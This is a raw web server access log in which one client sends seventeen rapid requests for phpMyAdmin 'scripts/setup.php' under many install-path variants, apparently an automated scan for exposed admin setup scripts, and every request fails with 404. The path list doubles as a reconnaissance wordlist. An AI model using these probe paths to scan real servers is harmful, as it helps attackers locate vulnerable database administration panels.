209.141.61.40 - - [02/Mar/2022:12:41:21 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.1.0.0-english/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:21 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:22 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php HTTP/1.0" 404 355 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:22 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php HTTP/1.0" 404 355 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:23 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.1.2.0-english/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:24 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:24 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.4.3.1/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:25 +0100] "GET http://212.91.246.81:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:25 +0100] "GET http://212.91.246.81:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:26 +0100] "GET http://212.91.246.81:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:26 +0100] "GET http://212.91.246.81:80/php/phpmyadmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:27 +0100] "GET http://212.91.246.81:80/php/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:28 +0100] "GET http://212.91.246.81:80/_pma/scripts/setup.php HTTP/1.0" 404 327 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:28 +0100] "GET http://212.91.246.81:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:29 +0100] "GET http://212.91.246.81:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:29 +0100] "GET http://212.91.246.81:80/tools/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:30 +0100] "GET http://212.91.246.81:80/webapps/phpmyadmin/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
